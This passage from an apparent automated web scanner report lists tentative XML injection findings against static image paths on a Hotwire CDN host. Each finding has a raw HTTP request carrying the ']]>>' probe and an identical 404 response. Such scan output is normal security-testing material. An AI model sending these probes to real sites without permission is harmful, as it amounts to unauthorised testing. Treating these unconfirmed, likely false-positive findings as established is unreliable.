GET /static/images/global/bullets/red-bullet-img.gif]]>>?ver=211768 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Expires: Mon, 03 Oct 2011 01:02:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:12 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.102. http://ak-static.hotwirestatic.com/static/images/global/buttons/promo-button-red.gif [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/buttons/promo-button-red.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/global/buttons/promo-button-red.gif?ver=205501 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:57 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.103. http://ak-static.hotwirestatic.com/static/images/global/buttons/promo-button-red.gif [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/buttons/promo-button-red.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/global/buttons/promo-button-red.gif?ver=205501 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:00 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.104. http://ak-static.hotwirestatic.com/static/images/global/buttons/promo-button-red.gif [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/buttons/promo-button-red.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/global]]>>/buttons/promo-button-red.gif?ver=205501 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535999
Date: Mon, 03 Oct 2011 01:02:04 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.105. http://ak-static.hotwirestatic.com/static/images/global/buttons/promo-button-red.gif [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/buttons/promo-button-red.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/global/buttons]]>>/promo-button-red.gif?ver=205501 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:07 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.106. http://ak-static.hotwirestatic.com/static/images/global/buttons/promo-button-red.gif [REST URL parameter 5]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/buttons/promo-button-red.gif

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/global/buttons/promo-button-red.gif]]>>?ver=205501 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Expires: Mon, 03 Oct 2011 01:02:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:10 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.107. http://ak-static.hotwirestatic.com/static/images/hotel/details/about-your-hotel-headline.gif [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/about-your-hotel-headline.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/hotel/details/about-your-hotel-headline.gif?ver=222796 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:56 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.108. http://ak-static.hotwirestatic.com/static/images/hotel/details/about-your-hotel-headline.gif [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/about-your-hotel-headline.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/hotel/details/about-your-hotel-headline.gif?ver=222796 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535947
Date: Mon, 03 Oct 2011 01:01:58 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.109. http://ak-static.hotwirestatic.com/static/images/hotel/details/about-your-hotel-headline.gif [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/about-your-hotel-headline.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel]]>>/details/about-your-hotel-headline.gif?ver=222796 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:03 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.110. http://ak-static.hotwirestatic.com/static/images/hotel/details/about-your-hotel-headline.gif [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/about-your-hotel-headline.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel/details]]>>/about-your-hotel-headline.gif?ver=222796 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535994
Date: Mon, 03 Oct 2011 01:02:08 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.111. http://ak-static.hotwirestatic.com/static/images/hotel/details/about-your-hotel-headline.gif [REST URL parameter 5]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/about-your-hotel-headline.gif

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel/details/about-your-hotel-headline.gif]]>>?ver=222796 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Expires: Mon, 03 Oct 2011 01:02:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:13 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.112. http://ak-static.hotwirestatic.com/static/images/hotel/details/car_icon.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/car_icon.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/hotel/details/car_icon.jpg?ver=222796 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:55 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.113. http://ak-static.hotwirestatic.com/static/images/hotel/details/car_icon.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/car_icon.jpg

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/hotel/details/car_icon.jpg?ver=222796 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:58 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.114. http://ak-static.hotwirestatic.com/static/images/hotel/details/car_icon.jpg [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/car_icon.jpg

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel]]>>/details/car_icon.jpg?ver=222796 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:03 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.115. http://ak-static.hotwirestatic.com/static/images/hotel/details/car_icon.jpg [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/car_icon.jpg

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel/details]]>>/car_icon.jpg?ver=222796 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535948
Date: Mon, 03 Oct 2011 01:02:08 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.116. http://ak-static.hotwirestatic.com/static/images/hotel/details/car_icon.jpg [REST URL parameter 5]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/car_icon.jpg

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel/details/car_icon.jpg]]>>?ver=222796 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Expires: Mon, 03 Oct 2011 01:02:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:13 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.117. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-curved-corners-with-opaque-gradient.png [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-bottom-curved-corners-with-opaque-gradient.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/hotel/details/img-bottom-curved-corners-with-opaque-gradient.png?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:20 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.118. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-curved-corners-with-opaque-gradient.png [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-bottom-curved-corners-with-opaque-gradient.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/hotel/details/img-bottom-curved-corners-with-opaque-gradient.png?ver=218159 HTTP/1.1
